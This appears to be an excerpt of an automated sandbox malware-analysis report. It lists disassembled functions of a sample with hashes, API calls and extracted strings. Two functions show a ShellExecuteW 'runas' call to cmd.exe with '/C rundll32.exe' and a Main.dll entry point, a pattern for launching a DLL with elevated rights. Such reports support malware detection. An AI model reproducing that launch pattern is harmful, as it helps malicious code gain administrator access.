                                          • String ID: Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                          • API String ID: 1587990502-2941716148
                                          • Opcode ID: 9c114e77050a05805f1ca338abf83d1f0e96c9aff991e8f61740973ca6fbcebb
                                          • Instruction ID: a7a0aec440acd39ccd20d4cd34ac409d5a55628ae86079b7fe058c669c02446e
                                          • Opcode Fuzzy Hash: 9c114e77050a05805f1ca338abf83d1f0e96c9aff991e8f61740973ca6fbcebb
                                          • Instruction Fuzzy Hash: 94319372A04205AFDB04CFE8D945ADE77B8EF45725F208959F910AB6C0F731EA01AB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39CB13 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: operator+$Name::operator+
                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                          • API String ID: 1198235884-2239912363
                                          • Opcode ID: 97ae005b5e15f94f2449ac1a700dc473eca6110e9f398901915efc4f64fae102
                                          • Instruction ID: 8cbe6593dbe4852180f3cd5ed3d3193744633aaf5fc37aef50eb936dbd13b328
                                          • Opcode Fuzzy Hash: 97ae005b5e15f94f2449ac1a700dc473eca6110e9f398901915efc4f64fae102
                                          • Instruction Fuzzy Hash: 1A417BB1C0460AEFDF00CFD8C855BEEBBB9AB01314F548589E514AF280E7769648EF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00341830 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • Warning.VMWAREBASE(received CONNECT_VPXA command: %s,?), ref: 0034183E
                                            • Part of subcall function 00343B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00343B96
                                          Strings
                                          • Command '%s%s' not authorized for vpxa contact, xrefs: 00341878
                                          • received CONNECT_VPXA command: %s, xrefs: 00341839
                                          • vmware-vpxa, xrefs: 003418E5
                                          • Global command %s%s to non-vpxa targets not supported, xrefs: 003418AE
                                          • User not authorized for vpx agent contact, xrefs: 003418BB
                                          • Invalid arguments to '%s', xrefs: 0034184E
                                          • vpxa-nfc, xrefs: 00341897
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning
                                          • String ID: Command '%s%s' not authorized for vpxa contact$Global command %s%s to non-vpxa targets not supported$Invalid arguments to '%s'$User not authorized for vpx agent contact$received CONNECT_VPXA command: %s$vmware-vpxa$vpxa-nfc
                                          • API String ID: 2415109466-3576414198
                                          • Opcode ID: 567d9d077d0af31ed0c4943bb90c517987d6cd7dd2e8bb417679cb34b23dab3b
                                          • Instruction ID: 9570880f0b7583ea2fe9e85d8a66f7d22485c7a6bbf99b8be1d5fc923a943cec
                                          • Opcode Fuzzy Hash: 567d9d077d0af31ed0c4943bb90c517987d6cd7dd2e8bb417679cb34b23dab3b
                                          • Instruction Fuzzy Hash: 9711C1377C0B0472EB232689BC07FD63BC9DB41B66F040032F7186D5D2D291B5A092E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17AF19 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a886a3f9e7a54116018b070ee1f3b63534dc4af0b33d35dde65dfd15a4d08f23
                                          • Instruction ID: 5ea82fb2139be06adb1273da82b5807046ae54ce5b5d0417efe98f35f13fe370
                                          • Opcode Fuzzy Hash: a886a3f9e7a54116018b070ee1f3b63534dc4af0b33d35dde65dfd15a4d08f23
                                          • Instruction Fuzzy Hash: 3B219576904108FFCB51DFA5E880DDE7BB9BF08244F0141A6F6199B235EB72EA44DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1443B0 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 491COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextRandomRelease
                                          • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                          • API String ID: 3163166064-3989350086
                                          • Opcode ID: fca80fc1c70afd3e99f546018959882180c48ed4e880edd30ee4273bf8a7d01f
                                          • Instruction ID: 8ead844aa263c10ddc41382bda207fd7c17028868518f6614e2e51bcab174d78
                                          • Opcode Fuzzy Hash: fca80fc1c70afd3e99f546018959882180c48ed4e880edd30ee4273bf8a7d01f
                                          • Instruction Fuzzy Hash: B5120870D042488FEB04CFA8CC94BADB775FF49304F148298D515A768AD7F4AA85CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D144590 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 346sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(000007D0), ref: 6D1447C7
                                          • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,?,00000000,00000000), ref: 6D14492D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ExecuteShellSleep
                                          • String ID: ", ServiceCrtMain$/C rundll32.exe "$\Main.dll$\Main1.dll$cmd.exe$runas
                                          • API String ID: 4194306370-3989350086
                                          • Opcode ID: 9dfa74596ebe7dd2d2e6fb2e28c9a9689178a85c8225caaf4bde3a6f8113cd4f
                                          • Instruction ID: fdea9d7f5c20a75bfcd546747b0b726b3f42b63271f235cceabd74e3a268cf49
                                          • Opcode Fuzzy Hash: 9dfa74596ebe7dd2d2e6fb2e28c9a9689178a85c8225caaf4bde3a6f8113cd4f
                                          • Instruction Fuzzy Hash: 4BD1D870A042489FEB14CFA8CC94BADB775BF49304F24825CD115A768AD7F4AA85CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E399E68 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E399EF6
                                          • DName::operator+.LIBCMT ref: 6E399F49
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                            • Part of subcall function 6E398A8E: DName::operator+.LIBCMT ref: 6E398AAF
                                          • DName::operator+.LIBCMT ref: 6E399F3A
                                          • DName::operator+.LIBCMT ref: 6E399F9A
                                          • DName::operator+.LIBCMT ref: 6E399FA7
                                          • DName::operator+.LIBCMT ref: 6E399FEE
                                          • DName::operator+.LIBCMT ref: 6E399FFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$shared_ptr
                                          • String ID: Y9n
                                          • API String ID: 1037112749-484334328
                                          • Opcode ID: a342379896bdef7d7514a7eb0525981af9d95211958962e6d3c43a6ae7703706
                                          • Instruction ID: 428df3c159698d18c1162954312806746742262a3da8d143ae31e0bc1058eb3b
                                          • Opcode Fuzzy Hash: a342379896bdef7d7514a7eb0525981af9d95211958962e6d3c43a6ae7703706
                                          • Instruction Fuzzy Hash: 49512CB2904219AEDB05CFE4C895EEEBBBCEF48704F044559E546A7280FB70D648DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39DDAE Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 96COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DDFF
                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(6E39D7B6,6E39D7B6,00000010,Y9n,00000000,00000000,?,?,?,?,?,?,6E39D7B6,?,Y9n,00000000), ref: 6E39DE3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSignedatol
                                          • String ID: Y9n$`template-parameter$void$|+uyo
                                          • API String ID: 4068335672-3923180548
                                          • Opcode ID: 2ea75d1b19f2f9413b6a2dfde72c0a8609e216fa0ae58be1f44146129c7059af
                                          • Instruction ID: 164fdd8f0cdf5139348a6cca6a300cc1348dc59e0d54758e07a90be23e70f6b1
                                          • Opcode Fuzzy Hash: 2ea75d1b19f2f9413b6a2dfde72c0a8609e216fa0ae58be1f44146129c7059af
                                          • Instruction Fuzzy Hash: C2318F76D042099FDF04DBE8D855BEFB7BDAB49304F60042AD601B3180EB38AA08DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D171874 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D171951
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D17195C
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A50
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A6D
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171A8A
                                          • DName::operator+.LIBCMT ref: 6D171A9F
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6D171AB9
                                          • DName::operator+.LIBCMT ref: 6D171B8E
                                            • Part of subcall function 6D16D97C: DName::DName.LIBVCRUNTIME ref: 6D16D9DA
                                          • DName::DName.LIBVCRUNTIME ref: 6D171C05
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::
                                          • String ID:
                                          • API String ID: 3679549980-0
                                          • Opcode ID: 2f059cec497d0ebaaa03c305aa9c01a11711c1d2850f60bba3d0090dfec81330
                                          • Instruction ID: 1f3cca46c073351ae0bce2762a9c50263170be21e559120f305117035f0c3c02
                                          • Opcode Fuzzy Hash: 2f059cec497d0ebaaa03c305aa9c01a11711c1d2850f60bba3d0090dfec81330
                                          • Instruction Fuzzy Hash: 8BA1E372D4824A9ADB20CFF8D9A4BFE7B78AF16304F11501AD211B61ACDBF4D6858760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D185784 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 216c18689a3da80fefeacda11338fdbd9759221f892e3f26e9ad8627e07d57d2
                                          • Instruction ID: 4fad09b7e0580959a9c1f051656c618e9df358dbe95e456e49ea77729f1706bc
                                          • Opcode Fuzzy Hash: 216c18689a3da80fefeacda11338fdbd9759221f892e3f26e9ad8627e07d57d2
                                          • Instruction Fuzzy Hash: 1061D572D04705EFE720CF64D840BAAB7F9EB45720F11445AEA56AB28AE7F19940CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39AF9A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 192COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6E39AFA1
                                          • UnDecorator::getSymbolName.LIBCMT ref: 6E39B033
                                          • DName::operator+.LIBCMT ref: 6E39B137
                                          • DName::DName.LIBVCRUNTIME ref: 6E39B1DA
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                            • Part of subcall function 6E398D5F: DName::DName.LIBVCRUNTIME ref: 6E398DBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                          • String ID: (o9n$(o9n$Y9n
                                          • API String ID: 1134295639-2217328249
                                          • Opcode ID: ed131465016f4fbd29972caf467a0ca1f98b9d2a7a50d15d6d7c95e32fb13f13
                                          • Instruction ID: e7ee2b1aa6c2063ef59a94f9037ef25b3c7e67a0c36865f461ae9db2c69db0c8
                                          • Opcode Fuzzy Hash: ed131465016f4fbd29972caf467a0ca1f98b9d2a7a50d15d6d7c95e32fb13f13
                                          • Instruction Fuzzy Hash: F6716BB5D0421A9FDF00CFD8C490BEEBBBDBF09350F24015AD951AB254E7359984EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39E63D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39E681
                                          • DName::operator+.LIBCMT ref: 6E39E68D
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          • DName::operator+=.LIBCMT ref: 6E39E74B
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39CF50
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39D21A
                                            • Part of subcall function 6E398A8E: DName::operator+.LIBCMT ref: 6E398AAF
                                          • DName::operator+.LIBCMT ref: 6E39E708
                                            • Part of subcall function 6E398BBB: DName::operator=.LIBVCRUNTIME ref: 6E398BDC
                                          • DName::DName.LIBVCRUNTIME ref: 6E39E76F
                                          • DName::operator+.LIBCMT ref: 6E39E77B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                          • String ID: {for
                                          • API String ID: 2795783184-864106941
                                          • Opcode ID: 024292089bb98d40741c74a5051e0c3043139578cd54c6fd148e440e48f275b0
                                          • Instruction ID: cf06b13db656be9e42721cd3c3eab0e89451692a9cb0c323a11fbbfb045d941b
                                          • Opcode Fuzzy Hash: 024292089bb98d40741c74a5051e0c3043139578cd54c6fd148e440e48f275b0
                                          • Instruction Fuzzy Hash: BF4192B5A04708AFDB05DFE8C890BDE7BEDBB4A304F440858E196DB280F7369944D755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39D2A3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6E39E791: Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39D34D
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39CF50
                                            • Part of subcall function 6E39CEE5: DName::operator+.LIBCMT ref: 6E39D21A
                                          • DName::operator+.LIBCMT ref: 6E39D307
                                          • DName::operator+.LIBCMT ref: 6E39D313
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D365
                                          • DName::operator+.LIBCMT ref: 6E39D374
                                          • DName::operator+.LIBCMT ref: 6E39D380
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                          • String ID: Y9n
                                          • API String ID: 955152517-484334328
                                          • Opcode ID: 6d28698d5e0720f6f180c09bd5ca6fb5e25fa459b2c35268ccb11c85d2d9aba7
                                          • Instruction ID: 6fb0dc646f339cb560dd0f7621dde8b5e54c424c8b49f71a0c635a329cb0d8c2
                                          • Opcode Fuzzy Hash: 6d28698d5e0720f6f180c09bd5ca6fb5e25fa459b2c35268ccb11c85d2d9aba7
                                          • Instruction Fuzzy Hash: 9A314AB5A042049FCB08CFD8C491AEEBBFDBF99344F50885DE59A9B280FB349544DB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E399C61 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6E399AF7: Replicator::operator[].LIBCMT ref: 6E399B64
                                            • Part of subcall function 6E399AF7: DName::operator=.LIBVCRUNTIME ref: 6E399B87
                                          • DName::DName.LIBVCRUNTIME ref: 6E399CAD
                                          • DName::operator+.LIBCMT ref: 6E399CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+Name::operator=Replicator::operator[]
                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                          • API String ID: 2366804779-2211150622
                                          • Opcode ID: 31513ecae87bbd5619fb19863026318a06ffd40c0c1e2fcdcd0b8a0430d1ce2c
                                          • Instruction ID: a6668069e430fc1935b50ed0e08b379e680651dda4409728ffd66cf6f63963dc
                                          • Opcode Fuzzy Hash: 31513ecae87bbd5619fb19863026318a06ffd40c0c1e2fcdcd0b8a0430d1ce2c
                                          • Instruction Fuzzy Hash: A13123B890060A9FCF41CFD8C4A1BEEBBF9BB06348F404549D565AB240E7369648EF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E398083 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,6E398078,6E396248), ref: 6E398091
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E39809F
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E3980B8
                                          • SetLastError.KERNEL32(00000000,?,6E398078,6E396248), ref: 6E39810C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 648352df9d496a183fc8bb50f7c45973f9db4c8b9ca1c4889b5a3af02cd161da
                                          • Instruction ID: a3e802207b7ea94f1b1b34cf21e93e6d0570eb6e591879d981c835304aeb9b79
                                          • Opcode Fuzzy Hash: 648352df9d496a183fc8bb50f7c45973f9db4c8b9ca1c4889b5a3af02cd161da
                                          • Instruction Fuzzy Hash: 7C012877118A12AEEB654EFEEC8458F3A5CEB873B433006AAF960821D4FF564884F150
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16B80E Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___TypeMatch.LIBVCRUNTIME ref: 6D16BA3B
                                          • _UnwindNestedFrames.LIBCMT ref: 6D16BB8D
                                          • CallUnexpected.LIBVCRUNTIME ref: 6D16BBA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
